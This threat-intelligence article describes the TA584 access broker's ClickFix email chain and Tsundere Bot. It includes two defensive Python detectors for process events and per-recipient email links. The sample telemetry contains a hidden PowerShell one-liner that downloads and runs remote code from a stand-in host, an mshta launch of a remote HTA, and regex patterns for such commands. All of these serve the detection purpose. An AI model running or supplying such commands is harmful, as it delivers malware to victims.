The initial-access business: TA584 and Tsundere Bot pave the way to ransomware

Published · 5 min read

An actor that specializes in selling initial access to corporate networks, tracked by analysts as TA584, has stepped up its activity, and is doing so with a combination of new tools that raises the likelihood that an intrusion ends in a ransomware attack. The campaign, documented by Proofpoint researchers, shows a compromise chain carefully designed to evade static detection and to turn compromised legitimate accounts into entry points into corporate infrastructure.

The most striking piece of the puzzle is the addition of Tsundere Bot, a malware-as-a-service platform built on Node.js that Kaspersky described last year. Tsundere is not just a backdoor and loader; it also uses an unconventional technique to obtain the address of its command-and-control server: it reads it from the Ethereum blockchain, a variant of the blockchain "hiding" technique (EtherHiding) that other researchers have described. That flexibility and sophistication fits the role TA584 plays in the cybercrime ecosystem: supplying valuable access that other extortion groups can exploit.


According to Proofpoint's report, the current operation relies on hundreds of previously compromised accounts, which are used to send malicious emails through legitimate bulk-mailing services such as SendGrid or Amazon Simple Email Service. What follows is not a simple attachment or a generic link: each recipient receives a unique URL, and the infrastructure filters visitors by geographic location and IP address; the redirection chains also frequently pass through third-party traffic distribution systems (TDS) such as Keitaro. The goal is for only the intended victims to reach the next stage.

If the visitor passes the filters, they first see a CAPTCHA and then a page posing as a fix for some problem (the lure known in the analyses as ClickFix). That page instructs the user to run a PowerShell command; doing so makes the machine download and execute an obfuscated script in memory which, without leaving obvious files on disk, loads either XWorm, a well-known remote access trojan, or Tsundere Bot. After execution, the browser is redirected to a benign site to disguise the intrusion. This mode of operation shrinks the surface that security tools inspect and complicates signature-based detection.
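The PowerShell step above is also the most detectable one: a command pasted into the Run dialog is spawned by explorer.exe, and the command line itself has to fetch something and execute it. The following added example (my code, not from the Proofpoint or Kaspersky reports) scores constructed process-creation events along those lines; the event field names, the sample lines, the weights and the threshold are assumptions that would be tuned against a real fleet's baseline.

```python
"""Flag process-creation events matching the ClickFix pattern: an interpreter
launched from the desktop whose command line fetches and runs code in memory.
Added example; not code from the Proofpoint or Kaspersky reports. The event
schema (host/parent/image/cmdline) and the sample lines are constructed."""
import json
import re

# Interpreters a pasted Run-dialog command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A Win+R / Run-dialog launch is spawned by explorer.exe. "The user ran it
# from the desktop" is the defining feature of ClickFix, so it weighs most.
DESKTOP_PARENTS = {"explorer.exe"}
DESKTOP_WEIGHT = 2

# Case-insensitive indicators of "download and execute without touching disk".
INDICATORS = {
    "download": re.compile(
        r"invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring|"
        r"net\.webclient|https?://", re.I),
    "in_memory_exec": re.compile(
        r"invoke-expression|\biex\b|\[scriptblock\]::create|frombase64string", re.I),
    "stealth": re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|"
        r"-executionpolicy\s+bypass", re.I),
    "encoded": re.compile(
        r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def basename(path):
    """Last component of a (possibly quoted) Windows path, lower-cased."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, matched indicator names) for one process-creation event."""
    if basename(ev.get("image", "")) not in SHELLS:
        return 0, []
    cmd = ev.get("cmdline", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    score = len(hits)
    if basename(ev.get("parent", "")) in DESKTOP_PARENTS:
        hits.append("desktop_parent")
        score += DESKTOP_WEIGHT
    return score, hits

def detect_clickfix(jsonl_lines, threshold=3):
    """Parse JSON-lines events and return the ones that reach the threshold."""
    alerts = []
    for line in jsonl_lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev.get("host"), "image": basename(ev["image"]),
                           "score": score, "hits": hits,
                           "cmdline": ev.get("cmdline", "")})
    return alerts

# Constructed sample telemetry (not real logs); example.invalid is a reserved name.
SAMPLE_EVENTS = r"""
{"host": "WS-0141", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -w hidden -nop -ep bypass -c \"iex (irm https://example.invalid/verify)\""}
{"host": "WS-0141", "parent": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"host": "WS-0207", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"host": "WS-0207", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "cmdline": "chrome.exe https://example.invalid/"}
{"host": "WS-0311", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta https://example.invalid/verify.hta"}
"""

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS.splitlines()):
        print(alert["host"], alert["image"], alert["score"], alert["hits"])
```

Run as-is, it reports the two events that reach the threshold: the ClickFix-style PowerShell one-liner and an mshta launch of a remote HTA from the desktop, while the scheduled inventory script and an interactively opened console stay below it. The Run-dialog history kept under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a useful corroborating artifact for the same pattern.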

TA584's trajectory is not static: over the years Proofpoint has observed the actor using a wide variety of malware families, from infostealers such as Ursnif to post-exploitation frameworks such as Cobalt Strike. The volume of reported campaigns rose toward the end of 2025 compared with the first quarter, and the targets' geography expanded beyond North America and the UK and Ireland to reach Germany, other European countries and Australia. This expansion suggests a clear intention to diversify markets and monetize access in multiple regions.

Tsundere Bot, for its part, brings features that make it especially attractive to operators seeking persistence and a foothold from which to explore the network: it collects system information to profile potential victims, can execute arbitrary JavaScript sent by its command-and-control server, lets compromised machines be used as SOCKS proxies, and even has a built-in marketplace where "bots" can be bought and sold. In addition, the installer embeds a hard-coded fallback control address for when the blockchain lookup fails, and it refuses to deploy on systems whose language settings are typical of the Commonwealth of Independent States, which points to a deliberate effort to spare operators and victims in the CIS region.

All of this is why Proofpoint researchers judge that Tsundere Bot infections, when they are part of TA584 operations, have a high potential to lead to ransomware incidents. In practice, the sale of initial access makes it easier for other, more specialized groups, the ransomware operators, to rent or buy an already-authenticated foothold and only have to deploy their encryption or exfiltration payload to maximize the damage.


For security organizations and professionals the lesson is twofold: relying on sender validation and basic mail controls is not enough; it is also necessary to watch for subtler patterns such as abuse of legitimate email delivery providers, unique URLs per recipient, redirection chains and payloads that execute exclusively in memory. Best-practice guidance on ransomware and initial access recommends strengthening authentication, segregating privileges, monitoring in-memory process behaviour and training employees never to run commands that an untrusted web page asks them to paste. Official resources such as those of the U.S. agency CISA collect measures and recommendations that help harden defences: CISA - Ransomware Information.
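The point above about unique URLs per recipient, which the campaign description earlier made concrete, can be turned into a triage rule: normalize each link into a template and look for a sender whose every recipient received a different token under the same template. The following added example (my code, not from the Proofpoint report) does that over constructed mail-gateway log lines; the four-column log format, the tracking-style domain and the token heuristic are all assumptions.

```python
"""Cluster outbound-message URLs into templates so that a sender handing every
recipient a different token-like link under the same path stands out as one
campaign. Added example; not code from the Proofpoint report. The log format,
the sample lines and the tracking-style domain are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Heuristic for a per-recipient token: 12+ alphanumerics containing at least
# two digits, or 8+ hex characters. Hyphenated slugs such as "q4-roadmap" survive.
TOKEN = re.compile(r"^(?=(?:.*\d){2})[A-Za-z0-9]{12,}$|^[0-9a-fA-F]{8,}$")

def _mask(s):
    """Replace a token-like string with the placeholder '{t}'."""
    return "{t}" if TOKEN.match(s) else s

def url_template(url):
    """Collapse token-like path segments and query values into one template."""
    parts = urlsplit(url)
    path = "/".join(_mask(seg) for seg in parts.path.split("/"))
    query = "&".join(f"{k}={_mask(v)}"
                     for k, v in parse_qsl(parts.query, keep_blank_values=True))
    template = f"{parts.scheme}://{parts.netloc}{path}"
    return f"{template}?{query}" if query else template

def find_unique_link_campaigns(log_lines, min_recipients=3):
    """Group messages by (sender, URL template) and flag groups in which every
    recipient got a distinct URL, i.e. one link per target."""
    groups = defaultdict(lambda: {"recipients": set(), "urls": set()})
    for line in log_lines:
        if not line.strip():
            continue
        _ts, sender, rcpt, url = line.split()   # constructed: time sender rcpt url
        g = groups[(sender, url_template(url))]
        g["recipients"].add(rcpt)
        g["urls"].add(url)
    campaigns = []
    for (sender, template), g in groups.items():
        n = len(g["recipients"])
        if n >= min_recipients and len(g["urls"]) == n:
            campaigns.append({"sender": sender, "template": template, "recipients": n})
    return campaigns

# Constructed sample log. The first three lines imitate the shape of an email
# service provider's click-tracking links (the domain and parameter are made up).
SAMPLE_LOG = """
2025-11-03T09:12:01Z billing@acme-partner.example alice@corp.example https://u1234.ct.mailer.example/ls/click?upn=Q9x7Lm2kP0vR8tZ1
2025-11-03T09:12:03Z billing@acme-partner.example bob@corp.example https://u1234.ct.mailer.example/ls/click?upn=Hj4Kd8Pq2Wn6Ys0B
2025-11-03T09:12:05Z billing@acme-partner.example carol@corp.example https://u1234.ct.mailer.example/ls/click?upn=Tr2Fv9Xc5Lm1Qa7E
2025-11-03T10:01:00Z news@vendor.example alice@corp.example https://www.vendor.example/blog/q4-roadmap
2025-11-03T10:01:02Z news@vendor.example bob@corp.example https://www.vendor.example/blog/q4-roadmap
2025-11-03T10:01:04Z news@vendor.example carol@corp.example https://www.vendor.example/blog/q4-roadmap
2025-11-03T11:20:00Z hr@corp.example dave@corp.example https://intranet.corp.example/docs/7f3a9c1e2b
"""

if __name__ == "__main__":
    for c in find_unique_link_campaigns(SAMPLE_LOG.splitlines()):
        print(c["sender"], c["template"], c["recipients"])
```

Legitimate marketing platforms also generate per-recipient click-tracking links, so a hit is a triage signal to combine with sender reputation or first-seen-sender data, not a verdict on its own. The token heuristic is deliberately conservative: the recurring newsletter slug is left unmasked and therefore not flagged, and the single intranet document link falls under the recipient minimum.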

In an ecosystem where access brokers and malware-as-a-service platforms are professionalized, prevention requires combining policy, technology and training. Offensive innovation does not stop, and neither can defenders: monitoring compromise chains, updating rules to detect living-off-the-land techniques (such as PowerShell abuse) and analyzing in-memory behaviour are the measures that today make the difference between a thwarted attempt and an intrusion that pays off for the attackers.

For those who want to dig into the technical findings and the examples of the attack chain, the Proofpoint report is detailed and recommended reading for its view of TA584 and the tactics observed: Proofpoint - TA584 analysis. To understand the technical side of Tsundere Bot and its use of the blockchain as a resilience mechanism, the Kaspersky report provides valuable context: Kaspersky - Tsundere Bot.
